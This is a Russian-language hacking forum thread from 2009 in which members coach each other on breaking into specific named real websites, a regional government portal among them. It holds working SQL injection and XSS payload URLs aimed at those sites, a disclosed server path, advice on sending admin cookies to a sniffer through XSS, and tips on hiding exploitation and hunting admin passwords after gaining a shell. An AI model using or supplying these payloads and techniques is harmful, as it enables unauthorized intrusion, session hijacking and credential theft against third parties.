Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    massovka
    хмм прочитай файл авторизации к админке.. потом в базе найди нужные поля
     
  2. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    кто-нибудь выложите ссылки на темы в этом форуме относительно того

    как не палить баг в get-параметрах . слыхал что страницу сохраняют, потом get меняют на post . а как точно ?

    надоело, засекают сразу
     
  3. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    FarIZ, Вот тут если у вас Firefox
    Перед использованием проверьте что уязвимость доступна через POST, не всегда это бывает...
     
    #6603 Kraneg, 13 Apr 2009
    Last edited: 13 Apr 2009
  4. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    есть сайт
    http://www.juntadeandalucia.es
    я росканил хспайдером мне дало интиресну весч

    Данная версия вебсервера Apache содержит chunked encoding уязвимость, что, помимо выведения сервера из строя, позволяет атакующему выполнить произвольный код, если сервер работает под управлением ОС FreeBSD, OpenBSD или NetBSD.
    и
    2 Возможно выполнение атаки межсайтовый скриптинг. Межсайтовый скриптинг (Cross site scripting или XSS) это возможность вставки HTML кода в уязвимую страницу. Инъекция кода осуществляется через все доступные способы ввода информации. Успешное завершение атаки может привести к использованию значений различных переменных, доступных в контексте сайта, записи информации, перехвату пользовательских сессий и т.д.

    http://222.zone-217.12.16.juntadeandalucia.es:8081/webct/ticket/ticketLogin?action=print_login&request_uri=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22

    как можна использовать ету уязвимость еть у кого ссылки на ету инфу буду благодарен ...
    я пытался вдудлить туда XSS но ничего не дало

    желательно примеры ли ресурсы такие по теме а не посылать в гугл я там был и там нех нету ...
    хацкеры жду помощи )
     
    #6604 теща, 13 Apr 2009
    Last edited: 13 Apr 2009
  5. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    теща
    sql иньеция
    http://www.juntadeandalucia.es/servicioandaluzdesalud/hpm/neumologia/noticias.php?id=-2295+or+1=1--
    http://www.juntadeandalucia.es/averroes/~cepja4/html/menu.3.php?codigo=092321GT54'

    а так же раскрытие путей
    /mnt/centr2/41/41000612/includes/database.php

    нащет хсс.. подкидывай сыслку админку и его куки летят тебе на снифер
     
    #6605 VITАL, 13 Apr 2009
    Last edited: 13 Apr 2009
    1 person likes this.
  6. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Ребята такой вопрос! Где могут сохранятся пароли от админки cayt/admin ! В phpadmin ничего не нашел доступ из шел только в папки сайта! Где они могу прятятся пароли?
     
  7. serfertty

    serfertty Guest

    Reputations:
    0
    Шелл есть? Есть доступ к скриптам? Посмотри, в одном из них могут храниться данные для доступа к БД. например cayt/admin/index.php
     
  8. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    да есть! Я вотчитал его не не могу разобратся! просто я начинающий может дам посмотришь его?

    есть login.php и index.php
     
    #6608 massovka, 13 Apr 2009
    Last edited: 13 Apr 2009
  9. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    http://www.openworld.gov/news/gallery.php?id=-1'+union+select+version()/*

    http://www.openworld.gov/phpMyAdmin/
    phpMyAdmin есть но нет таблицы с юзерами.......как я понял я нервно курю в сторонке, т.к мне прав не хватает прочитать таблицы phpMyAdmin'а?
     
    #6609 +++AndreyDevil+++, 13 Apr 2009
    Last edited: 13 Apr 2009
  10. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    104 phpbb_users - таблица с юзверями...
    Андрей будь внимательней...
     
  11. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    Может я слепой, но почему то форума там не наблюдаю (!)...
     
    1 person likes this.
  12. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    В таком случае встречный вопрос, таблицу с юзерами от чего ты ищешь, реги так сказать я там тоже не наблюдаю... хотя если только на поддомене: dd.openworld.gov жаль акка нет, регаться влом... насчет форума точно сказать не могу... скорее всего был когда то а таблицы не снесли...
     
    #6612 DrAssault, 13 Apr 2009
    Last edited: 13 Apr 2009
  13. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    Я уже задал вопрос!
     
  14. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    +++AndreyDevil+++, ОМГ =) а ничего что форум может быть вовсе не здесь, а на соседнем сайте? reverse-ip вам в руки =) а так еще проще concat_ws(0x3a,TABLE_SCHEMA,TABLE_NAME) тогда будете еще знать в какой БД данная таблица, может дать наводку где это искать...
     
  15. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    +++AndreyDevil+++
    phpbb - скелет в шкафу он там когдато был(проверь по гуглу ), форум снесли , а таблицы забыли.
     
    1 person likes this.
  16. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    http://web.archive.org/web/20031121221659/http://www.openworld.gov/
    был, теперь нету.. ищи то, куда можно подставить данные из sys_user
     
    1 person likes this.
  17. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Здравствуйте

    Вопрос
    на сайте www.sait.ru/new's.html
    Пишет: You have an error in your SQL syntax... и.т.д
    можно ли делать запрос, и kak вообще это должно выглядит.

    пробовал так: www.sait.ru/news+group+by+1+.html
    Неправильно )))
     
  18. serfertty

    serfertty Guest

    Reputations:
    0
    А если так?
    Code:
    http://www.sait.ru/news+group+by+1/*.html
    http://www.sait.ru/news/**/group/**/by/**/1.html
    
    Вообще там mod_rewrite. ВОзможно скуль с посимвольным......
     
  19. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    www.zemskov.ru

    таких вообще много где в конце .html

    но толком не знаю kak делать запрос.
    кто нибудь может показать на примере или мост есть статья .
     
  20. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Забавная инъекция
    Code:
    http://www.zemskov.ru/e_mail' and 1=2 union select 1,0x706870696e666f28293b,3,4,5,6,7,8,9,10,11,12,13,14,15+--+.html
     
    #6620 Scipio, 14 Apr 2009
    Last edited: 14 Apr 2009
    7 people like this.
Thread Status:
Not open for further replies.